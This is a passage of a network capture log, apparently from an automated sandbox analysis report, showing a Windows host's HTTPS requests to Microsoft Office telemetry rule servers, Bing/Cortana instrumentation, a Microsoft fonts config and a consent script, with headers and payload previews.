                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              134192.168.2.104986513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:20 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1388
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                              x-ms-request-id: baa0ac7b-001e-0082-1291-3f5880000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153220Z-174f78459685726chC1EWRsnbg0000000x7g000000006az8
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              135192.168.2.104986413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:20 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1425
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                              x-ms-request-id: 33f796ab-601e-0097-5c3a-40f33a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153220Z-174f7845968cdxdrhC1EWRg0en0000000x0000000000nr37
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              136192.168.2.1049853173.222.162.55443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC2083OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                                                                                                              Origin: https://www.bing.com
                                                                                                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                                                              Content-type: text/xml
                                                                                                                                                                                                                                                              X-Agent-DeviceId: 01000A4109007A20
                                                                                                                                                                                                                                                              X-BM-CBT: 1696501796
                                                                                                                                                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                                                                                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                                                                                                              X-BM-DeviceScale: 100
                                                                                                                                                                                                                                                              X-BM-DTZ: 120
                                                                                                                                                                                                                                                              X-BM-Market: CH
                                                                                                                                                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                                                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                                                                                                                              X-Device-ClientSession: D95703EFC0844C95954C44563A05B5B6
                                                                                                                                                                                                                                                              X-Device-isOptin: false
                                                                                                                                                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                                                                                                              X-Device-OSSKU: 48
                                                                                                                                                                                                                                                              X-Device-Touch: false
                                                                                                                                                                                                                                                              X-DeviceID: 01000A4109007A20
                                                                                                                                                                                                                                                              X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                                                                                                              X-PositionerType: Desktop
                                                                                                                                                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                                                                                                                                                              X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                              Host: www.bing.com
                                                                                                                                                                                                                                                              Content-Length: 608
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Cookie: SRCHUID=V=2&GUID=4DCD32EA63724A15B9FCA9A424F62E4E&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&LUT=1696499427949&IPMH=7bc3b11d&IPMID=1696501796291&HV=1696501608; MUID=985D67226D4E42EFB34FF259DA244FF8; _SS=SID=1C5CE73126DC645D35AAF490270A65A3&CPID=1696501797283&AC=1&CPH=893a1c21; _EDGE_S=SID=1C5CE73126DC645D35AAF490270A65A3
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC608OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 39 38 35 44 36 37 32 32 36 44 34 45 34 32 45 46 42 33 34 46 46 32 35 39 44 41 32 34 34 46 46 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 38 41 39 43 37 41 44 39 39 36 34 34 30 31 36 41 44 42 32 42 41 45 38 41 31 30 46 36 35 39 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
                                                                                                                                                                                                                                                              Data Ascii: <ClientInstRequest><CID>985D67226D4E42EFB34FF259DA244FF8</CID><Events><E><T>Event.ClientInst</T><IG>78A9C7AD99644016ADB2BAE8A10F6594</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC479INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              X-MSEdge-Ref: Ref A: 98E4060B16DA4D42AEEECD286DE3048E Ref B: LAX311000115051 Ref C: 2024-11-27T15:32:20Z
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:20 GMT
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                                                                                              X-CDN-TraceID: 0.2ea6dc17.1732721540.c5f322c


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              137192.168.2.104986823.52.182.8443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=125278
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:21 GMT
                                                                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              138192.168.2.104986613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                              x-ms-request-id: cf7e946f-901e-0083-4991-3fbb55000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153221Z-174f784596886s2bhC1EWR743w0000000x4g00000000eet7
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              139192.168.2.104986913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                              x-ms-request-id: effa0956-a01e-0032-4c91-3f1949000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153221Z-174f7845968g6hv8hC1EWR1v2n0000000530000000008rzt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              140192.168.2.104987313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:22 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                              x-ms-request-id: 78d92e2f-501e-0029-3937-40d0b8000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153222Z-174f7845968frfdmhC1EWRxxbw0000000x4g00000000f1b4
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              141192.168.2.104987213.107.246.634434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                                                                              Host: wcpstatic.microsoft.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:22 GMT
                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                              Content-Length: 52717
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                              Age: 30408
                                                                                                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                                                                                                              Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                                                                              Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                              x-ms-request-id: 33786f00-e01e-00da-739a-40593e000000
                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153222Z-174f7845968swgbqhC1EWRmnb40000000xc0000000001w6g
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
